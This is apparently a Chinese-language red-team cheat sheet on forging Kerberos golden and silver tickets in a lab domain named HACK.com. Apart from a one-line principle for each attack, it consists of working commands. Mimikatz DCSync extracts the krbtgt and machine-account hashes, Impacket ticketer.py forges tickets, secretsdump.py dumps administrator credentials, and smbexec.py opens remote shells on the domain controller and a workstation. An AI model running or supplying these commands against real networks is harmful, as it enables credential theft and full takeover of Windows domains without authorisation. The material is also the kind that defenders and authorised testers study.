黄金票据

原理：获取 krbtgt 的哈希后，使用此哈希能离线生成任意域用户的 tgt，域管理员的 tgt 就是黄金票据。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:HACK\krbtgt /csv" "exit"
​
58d7afab7f5f7ca0d4a6295ada00fd8e

# 生成黄金票据
python3 ticketer.py -domain-sid S-1-5-21-2992640285-1035252920-1077850616 -nthash 58d7afab7f5f7ca0d4a6295ada00fd8e -domain HACK.com administrator
# 导入票据
export KRB5CCNAME=administrator.ccache
# 导出 administrator 用户的哈希
​
python3 secretsdump.py -k -no-pass administrator@DC01.HACK.com -dc-ip 192.168.72.21 -just-dc-user HACK/administrator
​
# 访问域控 DC01
python3 smbexec.py -no-pass -k administrator@DC01.HACK.com -dc-ip 192.168.72.21
​
# 访问域内主机 win10
python3 smbexec.py -no-pass -k administrator@WIN10-02.HACK.com -dc-ip 192.168.72.21 -codec gbk

mimikatz.exe
#生成并导入黄金票据到当前内存中
​
kerberos::golden /user:administrator /domain:HACK.com /sid:S-1-5-21-2992640285-1035252920-1077850616 /krbtgt:58d7afab7f5f7ca0d4a6295ada00fd8e /ptt
​
#验证是否成功，导出指定用户哈希
lsadump::dcsync /domain:HACK.com /all /csv

白银票据

原理：获取某个服务账户的哈希后，使用普通域用户访问此服务后，使用获得的哈希解密 st 服务票据，然后给 pac 添加一个高权限用户，并使用此哈希伪造 PAC_SERVER_CHECKSUM 签名。而 PAC_PRIVSVR_CHECKSUM 签名伪造需要 krbtgt 的哈希，但是此签名可选且默认不开启，直接忽视。

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:HACK.com /user:DC01$ /csv" "exit"
​
32538b59408163c76f5439225907c28e

#生成白银票据
python3 ticketer.py -domain-sid S-1-5-21-2992640285-1035252920-1077850616 -nthash 32538b59408163c76f5439225907c28e -spn cifs/DC01.HACK.com -domain HACK.com administrator
​
#导入票据
export KRB5CCNAME=administrator.ccache
​
#导出 administrator 用户的哈希
python3 secretsdump.py -k -no-pass administrator@DC01.HACK.com -dc-ip 192.168.72.21 -just-dc-user HACK/administrator
​
#访问域控 DC01
python3 smbexec.py -no-pass -k administrator@DC01.HACK.com -dc-ip 192.168.72.21